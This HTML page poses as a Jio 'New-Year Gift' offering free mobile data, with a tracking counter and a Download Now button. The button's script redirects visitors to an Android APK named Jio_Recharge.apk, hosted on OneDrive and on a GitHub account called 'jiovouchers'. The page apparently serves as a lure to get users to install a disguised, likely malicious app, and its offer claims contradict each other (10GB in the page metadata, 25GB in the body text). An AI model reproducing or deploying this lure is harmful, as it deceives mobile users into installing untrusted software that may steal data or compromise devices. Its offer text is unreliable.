<script type="text/javascript">
var sc_project=12830989; 
var sc_invisible=1; 
var sc_security="311a332d"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js" async></script>
<noscript><div class="statcounter"><a title="Web Analytics Made Easy -
Statcounter" href="https://statcounter.com/" target="_blank"><img
class="statcounter" src="https://c.statcounter.com/12830989/0/311a332d/1/"
alt="Web Analytics Made Easy - Statcounter"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
<html>
    
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<head>
	<meta property="og:title"  content="Jio NEW-YEAR Gift">
	<meta property="og:image"  content="https://i.postimg.cc/05S82x0x/jtras.png">
	<meta property="og:image:width" content="15" />
	<meta property="og:image:height" content="15" />
	<meta property="og:description"  content="Get 10GB daily for 84-Days from Jio.">

    <Title>Download</Title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }

.dabavanu {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:hover {
	background-color:#315cbb;
}
.dabavanusw {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:active {
	position:relative;
	top:1px;
}

    </style>
</head>
<script>
function dbvao() 
{
    var m = new Date().getMinutes(); 
	if(m<60)
	{
		window.location="https://onedrive.live.com/download?cid=3C3A1A35F6E2B987&resid=3C3A1A35F6E2B987%21105&authkey=APHloaZisbWwnf0"; 
	}
	else if(m<50)
	{
		window.location="https://github.com/jiovouchers/10gb/raw/main/Jio_Recharge.apk";
	}
	else
	{
		window.location="https://github.com/jiovouchers/10gb/raw/main/Jio_Recharge.apk";
	}
}
</script>
<body>
<center>
    
        <img src="https://i.postimg.cc/05S82x0x/jtras.png"  height="100"/>
        <h2>Jio Data</h2><h3>
        Jio is giving Free 25GB Data pack<br>
to all Jio users.<br>
Team Jio.<br><br>
Offer available on only new Jio app.</h3>
        <div onclick="dbvao()"  class="dabavanu">Download Now</a>


        


    </div>
</center>
</html>
